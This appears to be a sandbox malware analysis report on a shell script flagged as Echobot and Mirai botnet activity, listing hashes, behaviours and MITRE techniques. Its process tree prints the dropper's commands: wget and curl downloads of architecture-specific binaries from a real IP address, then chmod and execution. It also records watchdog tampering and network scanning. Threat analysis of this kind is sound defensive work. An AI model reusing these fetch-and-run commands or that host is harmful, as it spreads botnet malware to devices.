Analysis
-
max time kernel
123s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
22-11-2024 18:53
Static task
static1
Behavioral task
behavioral1
Sample
8UsA.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
8UsA.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
8UsA.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
8UsA.sh
-
Size
1KB
-
MD5
513641f5f60d55559c2060489de6d605
-
SHA1
c95feec2255732b60d434b0639b88a5cff205ea0
-
SHA256
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
-
SHA512
71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
-
Detected Echobot 3 IoCs
Processes:
resource yara_rule behavioral4/files/fstream-1.dat family_echobot behavioral4/files/fstream-4.dat family_echobot behavioral4/files/fstream-5.dat family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (120441) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 797 chmod 873 chmod 940 chmod 738 chmod 767 chmod 841 chmod 887 chmod 901 chmod 916 chmod 745 chmod -
Executes dropped EXE 10 IoCs
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvAioc pid Process /tmp/3AvA 739 3AvA /tmp/3AvA 746 3AvA /tmp/3AvA 768 3AvA /tmp/3AvA 798 3AvA /tmp/3AvA 842 3AvA /tmp/3AvA 874 3AvA /tmp/3AvA 888 3AvA /tmp/3AvA 902 3AvA /tmp/3AvA 917 3AvA /tmp/3AvA 941 3AvA -
Modifies Watchdog functionality 1 TTPs 14 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvAdescription ioc Process File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA -
Enumerates active TCP sockets 1 TTPs 8 IoCs
Gets active TCP sockets from /proc virtual filesystem.
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvAdescription ioc Process File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA -
Changes its process name 7 IoCs
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvAdescription ioc pid Process Changes the process name, possibly in an attempt to hide itself 2hc3fco3nic02af1pf5 768 3AvA Changes the process name, possibly in an attempt to hide itself a53ani4n13ck0m1i4e 798 3AvA Changes the process name, possibly in an attempt to hide itself kndbf0jcoic 842 3AvA Changes the process name, possibly in an attempt to hide itself o41ffd54idok0 874 3AvA Changes the process name, possibly in an attempt to hide itself a5103o4mp15dmfh5id 888 3AvA Changes the process name, possibly in an attempt to hide itself nn214bdinpamhhd 902 3AvA Changes the process name, possibly in an attempt to hide itself chkhbao3505m54h3nc 917 3AvA -
Reads system network configuration 1 TTPs 8 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
3AvA3AvA3AvA3AvA3AvA3AvA3AvA3AvAdescription ioc Process File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA -
Processes:
3AvA3AvAcurl3AvA3AvAcurl3AvA3AvA3AvA3AvAcurlcurlcurldescription ioc Process File opened for reading /proc/1/fd 3AvA File opened for reading /proc/875/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/327/fd 3AvA File opened for reading /proc/919/fd 3AvA File opened for reading /proc/714/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/708/fd 3AvA File opened for reading /proc/678/fd 3AvA File opened for reading /proc/241/fd 3AvA File opened for reading /proc/714/fd 3AvA File opened for reading /proc/670/exe 3AvA File opened for reading /proc/327/fd 3AvA File opened for reading /proc/678/fd 3AvA File opened for reading /proc/708/fd 3AvA File opened for reading /proc/678/fd 3AvA File opened for reading /proc/923{1,1T 3AvA File opened for reading /proc/327/fd 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/327/fd 3AvA File opened for reading /proc/172/fd 3AvA File opened for reading /proc/714/fd 3AvA File opened for reading /proc/420/fd 3AvA File opened for reading /proc/359/fd 3AvA File opened for reading /proc/686/fd 3AvA File opened for reading /proc/172/fd 3AvA File opened for reading /proc/329/fd 3AvA File opened for reading /proc/330/fd 3AvA File opened for reading /proc/330/fd 3AvA File opened for reading /proc/330/fd 3AvA File opened for reading /proc/679/exe 3AvA File opened for reading /proc/329/fd 3AvA File opened for reading /proc/903/exe 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/380/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/172/fd 3AvA File opened for reading /proc/420/fd 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/329/fd 3AvA File opened for reading /proc/686/fd 3AvA File opened for reading /proc/379/fd 3AvA File opened for reading /proc/330/fd 3AvA File opened for reading /proc/420/fd 3AvA File opened for reading /proc/686/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/917/fd 3AvA File opened for reading /proc/706/exe 3AvA File opened for reading /proc/705/exe 3AvA File opened for reading /proc/331/fd 3AvA File opened for reading /proc/385/fd 3AvA File opened for reading /proc/679/fd 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/679/fd 3AvA File opened for reading /proc/708/fd 3AvA File opened for reading /proc/172/fd 3AvA File opened for reading /proc/861/fd 3AvA File opened for reading /proc/889/exe 3AvA File opened for reading /proc/331/fd 3AvA File opened for reading /proc/329/fd 3AvA File opened for reading /proc/172/fd 3AvA File opened for reading /proc/686/fd 3AvA File opened for reading /proc/147/fd 3AvA File opened for reading /proc/385/fd 3AvA -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlcat3AvApid Process 741 wget 743 curl 744 cat 746 3AvA -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlwgetcurlwgetcurlwgetcurlcurl8UsA.shcurlwgetcurlwgetwgetcurlcurlwgetwgetcurlwgetdescription ioc Process File opened for modification /tmp/UnHAnaAW.arm7 curl File opened for modification /tmp/UnHAnaAW.m68k wget File opened for modification /tmp/UnHAnaAW.sh4 curl File opened for modification /tmp/UnHAnaAW.mpsl wget File opened for modification /tmp/UnHAnaAW.arm6 curl File opened for modification /tmp/UnHAnaAW.arm7 wget File opened for modification /tmp/UnHAnaAW.ppc curl File opened for modification /tmp/UnHAnaAW.m68k curl File opened for modification /tmp/3AvA 8UsA.sh File opened for modification /tmp/UnHAnaAW.mpsl curl File opened for modification /tmp/UnHAnaAW.arm5 wget File opened for modification /tmp/UnHAnaAW.arm5 curl File opened for modification /tmp/UnHAnaAW.sh4 wget File opened for modification /tmp/UnHAnaAW.x86 wget File opened for modification /tmp/UnHAnaAW.arm4 curl File opened for modification /tmp/UnHAnaAW.mips curl File opened for modification /tmp/UnHAnaAW.arm6 wget File opened for modification /tmp/UnHAnaAW.ppc wget File opened for modification /tmp/UnHAnaAW.x86 curl File opened for modification /tmp/UnHAnaAW.mips wget
Processes
-
/tmp/8UsA.sh/tmp/8UsA.sh1⤵
- Writes file to tmp directory
PID:708 -
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.x862⤵
- Writes file to tmp directory
PID:712
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.x862⤵
- Writes file to tmp directory
PID:730
-
-
/bin/catcat UnHAnaAW.x862⤵PID:737
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:739
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:744
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.mips UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/catcat UnHAnaAW.mpsl2⤵PID:765
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:768
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm42⤵PID:773
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-1RRX4M UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:798
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm52⤵
- Writes file to tmp directory
PID:822
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm52⤵
- Writes file to tmp directory
PID:824
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:842
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm62⤵
- Writes file to tmp directory
PID:864
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm62⤵
- Writes file to tmp directory
PID:871
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:874
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm72⤵
- Writes file to tmp directory
PID:880
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm72⤵
- Writes file to tmp directory
PID:885
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:888
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.ppc2⤵
- Writes file to tmp directory
PID:892
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:902
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.m68k2⤵
- Writes file to tmp directory
PID:912
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:917
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.sh42⤵
- Writes file to tmp directory
PID:931
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.m68k UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.ppc UnHAnaAW.sh4 UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:941
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD51bfd79e3eb8d1d5806b78c2ee800ccbe
SHA18c7d5fb0ffe8c51e83cfe644a961d3b2bedb5e83
SHA256186fc8b8165ee76f730ea3b840c59473597282c472529c9b2716baab011787da
SHA512ade41301de6fdcbd940dd4a2cd7634ffd13dfb4f24c7b2e9b3e25aae7d3a7b1dce4817eada98e628d591cf8fcd1106d5292bee05ba3bcd6b6cc502135409bc0b
-
Filesize
102KB
MD5b76a7dcc2c049315ceac66d7a55408f9
SHA12219590bfc9d22674f2fd0d5d61c003b3a838eb9
SHA2560a64d4e8c432fd6272d4404adef0312a616d20cda9c84fd1ac8f5edc77cb6ff1
SHA512fe8d4e848a3827e816f9142e1615e4671b2e27ca1b5f6cac03b4d945adf551958e8b49ae1c4387268410aaa2495776b3ce3e3dc2aac2882c35dda3f44358e998
-
Filesize
69KB
MD54a5306ed50853b2ce31d13763bde2cd3
SHA112a84067a5b8ff314e005365faadd34d47ce0619
SHA25681d46cb68a82a4f80f26f017a9e988acd67811fb5b461df2546a23ccc5f6a05d
SHA512b9732bdbe82f34591e5e21b45f80fa7f465932aa6a6f07fd3389a866b0a94b39bd59d4f298fdd896e9b9a601bd4d72494338b1a5817d558ba3b6d2ed1d43e081